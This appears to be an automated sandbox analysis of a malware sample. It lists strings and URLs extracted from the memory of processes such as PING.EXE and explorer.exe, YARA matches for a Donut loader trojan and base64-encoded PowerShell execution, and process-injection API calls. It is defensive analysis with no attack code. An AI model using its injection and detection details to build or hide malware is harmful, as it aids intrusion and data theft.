              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076527414.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/open-source-parsers/jsoncpp.git)
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: PING.EXE, 0000000A.00000002.2244633091.000000000AC98000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2220634073.0000000006121000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2247366701.000000000BBB1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2241786299.00000000087C1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2516628836.000000000B591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: PING.EXE, 0000000A.00000002.2244633091.000000000AC98000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2220634073.0000000006121000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2247366701.000000000BBB1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2241786299.00000000087C1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2516628836.000000000B591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
              Source: explorer.exe, 00000006.00000000.1734959989.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933549368.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privac
              Source: PING.EXE, 0000000A.00000002.2244633091.000000000AC98000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2220634073.0000000006121000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2247366701.000000000BBB1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2241786299.00000000087C1000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2516628836.000000000B591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
              Source: explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
              Source: C:\Windows\SysWOW64\PING.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000002.2919882763.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000012.00000002.1992910476.0000026210CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000A.00000002.2192754630.0000000003120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000002.00000002.1839501596.000001DC171B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: Process Memory Space: powershell.exe PID: 2908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              .NET source code contains very large array initializations
              Source: 10.2.PING.EXE.7220000.2.raw.unpack, x0jkepdA6ZackeHF9v.csLarge array initialization: fc7TaaKHw: array initializer size 361056
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA97FD2 NtCreateThreadEx,2_2_00007FFD9BA97FD2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA97FC2 NtWriteVirtualMemory,2_2_00007FFD9BA97FC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA99DF5 NtCreateThreadEx,2_2_00007FFD9BA99DF5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA99535 NtWriteVirtualMemory,2_2_00007FFD9BA99535
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAC8A9D NtCreateThreadEx,18_2_00007FFD9BAC8A9D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAC8955 NtWriteVirtualMemory,18_2_00007FFD9BAC8955
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BAC8CCC NtCreateThreadEx,18_2_00007FFD9BAC8CCC
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA910A82_2_00007FFD9BA910A8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB69E7D2_2_00007FFD9BB69E7D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6ADE02_2_00007FFD9BB6ADE0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB622EF2_2_00007FFD9BB622EF
              Source: C:\Windows\explorer.exeCode function: 6_2_011B434E6_2_011B434E
              Source: C:\Windows\explorer.exeCode function: 6_2_011B3F7E6_2_011B3F7E
              Source: C:\Windows\explorer.exeCode function: 6_2_011B47866_2_011B4786
              Source: C:\Windows\explorer.exeCode function: 6_2_011B52266_2_011B5226
              Source: C:\Windows\explorer.exeCode function: 6_2_011B7A7E6_2_011B7A7E
              Source: C:\Windows\explorer.exeCode function: 6_2_011B308A6_2_011B308A
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0312434410_2_03124344
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_03123F7410_2_03123F74
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0312477C10_2_0312477C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0312521C10_2_0312521C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_03127A7410_2_03127A74
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0312308010_2_03123080
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0346E10_2_04D0346E
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D02BA210_2_04D02BA2
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D033A810_2_04D033A8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D024EE10_2_04D024EE
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D022BD10_2_04D022BD
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0345610_2_04D03456
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D02DF110_2_04D02DF1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0339810_2_04D03398
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0376F10_2_04D0376F
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0353710_2_04D03537
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0232610_2_04D02326
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_04D0352B10_2_04D0352B
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_071B15E810_2_071B15E8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_071B15E710_2_071B15E7
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07332B6810_2_07332B68
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07332B4A10_2_07332B4A
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0740950810_2_07409508
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0740967310_2_07409673
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07408D5010_2_07408D50
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07408D6010_2_07408D60
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074094F810_2_074094F8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074048E110_2_074048E1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074048F010_2_074048F0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07490FFF10_2_07490FFF
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0749133710_2_07491337
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074920A810_2_074920A8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B345E10_2_074B345E
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B5F9810_2_074B5F98
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B6CD010_2_074B6CD0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B67C110_2_074B67C1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B67D010_2_074B67D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B5F8810_2_074B5F88
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B6CC110_2_074B6CC1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B193810_2_074B1938
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B886210_2_074B8862
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B887010_2_074B8870
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_074B67D010_2_074B67D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_076247B810_2_076247B8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07628E9010_2_07628E90
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762AD7010_2_0762AD70
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_076253D010_2_076253D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07621BB810_2_07621BB8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762816910_2_07628169
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762817810_2_07628178
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762604010_2_07626040
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07628E8010_2_07628E80
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762AD6010_2_0762AD60
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07624B0010_2_07624B00
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762972210_2_07629722
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_0762970210_2_07629702
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_076212E810_2_076212E8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_076212DA10_2_076212DA
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07621F1C10_2_07621F1C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07621D1010_2_07621D10
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07621CB410_2_07621CB4
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07621BA810_2_07621BA8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07A8BEB810_2_07A8BEB8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 10_2_07A8D28810_2_07A8D288
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9BAC0E1B16_2_00007FFD9BAC0E1B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9BB933C918_2_00007FFD9BB933C9
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E308023_2_028E3080
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E521C23_2_028E521C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E7A7423_2_028E7A74
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E434423_2_028E4344
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E477C23_2_028E477C
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_028E3F7423_2_028E3F74
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D33B023_2_044D33B0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D2BB223_2_044D2BB2
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D345E23_2_044D345E
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D347623_2_044D3476
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D2E0123_2_044D2E01
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D22D523_2_044D22D5
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D377723_2_044D3777
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D250623_2_044D2506
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D353F23_2_044D353F
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D233E23_2_044D233E
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D353323_2_044D3533
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_044D33A023_2_044D33A0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06A015E823_2_06A015E8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06A015D823_2_06A015D8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06B72B6723_2_06B72B67
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06B72B6823_2_06B72B68
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C4950823_2_06C49508
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C4967323_2_06C49673
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C494F823_2_06C494F8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C48D5023_2_06C48D50
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C48D6023_2_06C48D60
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C448E123_2_06C448E1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06C448F023_2_06C448F0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CD100F23_2_06CD100F
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CD133723_2_06CD1337
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CD20A823_2_06CD20A8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF345E23_2_06CF345E
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF5F9823_2_06CF5F98
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF6CD023_2_06CF6CD0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF67C123_2_06CF67C1
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF67D023_2_06CF67D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF5F8823_2_06CF5F88
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF6CCF23_2_06CF6CCF
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF1AD023_2_06CF1AD0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF886123_2_06CF8861
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF887023_2_06CF8870
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06CF67D023_2_06CF67D0
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE47B823_2_06FE47B8
              Source: C:\Windows\SysWOW64\PING.EXECode function: 23_2_06FE8E9023_2_06FE8E90
